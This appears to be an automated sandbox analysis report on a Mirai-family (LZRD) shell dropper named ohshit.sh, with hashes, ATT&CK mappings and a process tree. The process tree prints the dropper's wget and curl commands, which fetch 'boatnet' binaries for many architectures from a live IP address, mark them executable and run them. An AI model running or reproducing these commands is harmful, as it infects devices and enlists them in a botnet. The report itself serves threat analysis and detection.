Analysis
-
max time kernel
148s -
max time network
141s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-02-2025 16:21
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
f0977aee35c9bf421f707b9bfba5d9f7
-
SHA1
5eacb3c68403f8f9c853f41914f27d5abc8645f5
-
SHA256
f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6
-
SHA512
3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 771 chmod 777 chmod 782 chmod 805 chmod 820 chmod 758 chmod 787 chmod 797 chmod 813 chmod 720 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/WTF 721 ohshit.sh /tmp/WTF 759 ohshit.sh /tmp/WTF 772 ohshit.sh /tmp/WTF 778 ohshit.sh /tmp/WTF 783 ohshit.sh /tmp/WTF 789 ohshit.sh /tmp/WTF 798 ohshit.sh /tmp/WTF 806 ohshit.sh /tmp/WTF 814 ohshit.sh /tmp/WTF 821 ohshit.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/646/cmdline WTF File opened for reading /proc/809/cmdline WTF File opened for reading /proc/831/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/587/cmdline WTF File opened for reading /proc/643/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/589/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/829/cmdline WTF File opened for reading /proc/833/cmdline WTF File opened for reading /proc/835/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/815/cmdline WTF File opened for reading /proc/817/cmdline WTF File opened for reading /proc/642/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/641/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/576/cmdline WTF File opened for reading /proc/592/cmdline WTF File opened for reading /proc/601/cmdline WTF File opened for reading /proc/640/cmdline WTF File opened for reading /proc/828/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/803/cmdline WTF File opened for reading /proc/822/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTF File opened for reading /proc/824/cmdline WTF File opened for reading /proc/826/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 723 wget 754 curl 756 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.x86_64 wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:643 -
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677
-
-
/bin/catcat boatnet.x862⤵PID:719
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-cf68e324a6ac428995c37c2b6973dc6f-systemd-timedated.service-OVwMN4 WTF2⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/WTF./WTF2⤵PID:721
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:723
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:754
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:756
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-cf68e324a6ac428995c37c2b6973dc6f-systemd-timedated.service-OVwMN4 WTF2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/WTF./WTF2⤵PID:759
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:761
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/catcat boatnet.arc2⤵PID:770
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/WTF./WTF2⤵PID:772
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.i4682⤵PID:774
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/catcat boatnet.i4682⤵PID:776
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/WTF./WTF2⤵PID:778
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.i6862⤵PID:779
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/catcat boatnet.i6862⤵PID:781
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/WTF./WTF2⤵PID:783
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:784
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/catcat boatnet.x86_642⤵PID:786
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/WTF./WTF2⤵PID:789
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/catcat boatnet.mpsl2⤵PID:796
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTF./WTF2⤵PID:798
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/catcat boatnet.arm2⤵PID:804
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:806
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/catcat boatnet.arm52⤵PID:812
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/WTF./WTF2⤵PID:814
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/catcat boatnet.arm62⤵PID:819
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/WTF./WTF2⤵
- Reads runtime system information
PID:821
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:822
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD5e26c06fcc3b3e46040e49ac9c0b68928
SHA12a631555a166c51b94f898506385fe3648eb14e5
SHA2565232159e652b1445635ef83fb65f61290a253dd7184d329619998c10e0e9b744
SHA512443ee05d75e7c4151b0e9f88e604118e160b440b3be7353243bdb2e499c745aa42378769d3de3517fa09672eeef1d35669d0ae78abedcb8f12f65ae011d824e6
-
Filesize
121KB
MD59220e451fa71e3e48e84a8e92ff02048
SHA1113c6bf14a37bb9e39c6014733ad8937e2590bae
SHA256e78e7849fc3c272825be14fcc90f9f7db062b6b36317c57310c4c03acc48118f
SHA5125dbcb688b1b86fa7de6d6820eff1c57352eb76f4a899e7feee0e5478c8b2e68e00d59db9c3e54b850d058d45fbb86e3d5f94c8993b0565440b1ef75af6b7f853
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
34KB
MD5e109caa2b24b7264b0255150e0030335
SHA1cec6105439346b8dba4c1afb549a38db1c6be4a7
SHA2566e86cd7ed58787a99ec72f2f9f659af85e362a5a7c361c3c56b041291c25492c
SHA51208cd44acb7625f3ad596092f2f70ae20d9635936f7c2db646a54d2e09bc564fd0a038140f75be4479eef496e6b91676d7c1e55d876d949c2ea05d8c93173f1fd
-
Filesize
29KB
MD58231c76be6663e62d7d5a8ea685ff498
SHA103177493e6a6d9e3b7aaca572245065ffcfe0575
SHA256c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc
SHA5121a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac